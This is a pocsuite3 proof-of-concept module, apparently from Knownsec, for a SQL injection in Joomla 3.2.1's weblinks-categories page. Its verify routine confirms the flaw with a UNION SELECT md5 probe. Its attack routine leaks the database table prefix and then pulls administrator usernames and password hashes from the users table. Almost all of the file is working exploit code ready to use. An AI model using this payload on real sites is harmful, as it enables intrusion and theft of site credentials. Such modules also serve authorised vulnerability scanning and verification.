""" If you have issues about development, please read: https://github.com/knownsec/pocsuite3/blob/master/docs/CODING.md for more about information, plz visit http://pocsuite.org """ from pocsuite3.api import Output, POCBase, register_poc, requests, logger from pocsuite3.api import get_listener_ip, get_listener_port from pocsuite3.api import REVERSE_PAYLOAD from pocsuite3.lib.utils import random_str from requests.exceptions import ReadTimeout import re class DemoPOC(POCBase): vulID = '1209' # ssvid version = '1' author = ['chenghs@knownsec.com'] vulDate = '2014-02-06' createDate = '2014-03-27' updateDate = '2014-03-27' references = ['http://www.exploit-db.com/exploits/31459/'] name = 'Joomla 3.2.1 /helper.php SQL注入漏洞 POC' appPowerLink = 'http://www.joomla.org/' appName = 'Joomla' appVersion = '3.2.1#' vulType = 'SQL Injection' desc = ''' Joomla中存在SQL注入漏洞,该漏洞源于程序使用SQL查询语句之前没有充分过滤用户提交的输入 ''' samples = [] install_requires = [''] def _verify(self): result = {} weblinks_url = self.url + '/index.php/weblinks-categories?id=0' inj_url = weblinks_url + "%20%29%20union%20select%20md5%28'test'%29%20--%20%29" page_content = requests.get(inj_url).text match_md5 = re.search('098f6bcd4621d373cade4e832627b4f6', page_content) match_prefix = re.search('`(.*?)_contentitem_tag_map`', page_content) if match_md5: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = inj_url return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('target is not vulnerable') return output def _attack(self): result = {} weblinks_url = self.url + '/index.php/weblinks-categories?id=0' inj_url = weblinks_url + "%20%29%20union%20select%20md5%28'test'%29%20--%20%29" page_content = requests.get(inj_url).text match_md5 = re.search('098f6bcd4621d373cade4e832627b4f6', page_content) match_prefix = re.search('`(.*?)_contentitem_tag_map`', page_content) if not match_prefix: return self.parse_output(result) weblinks_url = self.url + 
'/index.php/weblinks-categories?id=0' inj_url = weblinks_url + "%20%29%20union%20select%20concat%28'username'%2Cusername%2C'password'%2Cpassword%29%20from%20%60" + match_prefix.group( 1) + "_users%60%20--%20%29" page_content = requests.get(inj_url).text password_match = re.search('username(.*?)password(.*?)\) AND', page_content) if password_match: result['AdminInfo'] = {} result['AdminInfo']['username'] = password_match.group(1) result['AdminInfo']['password'] = password_match.group(2) return self.parse_output(result) register_poc(DemoPOC)
暂无官方解决方案
暂无防护方案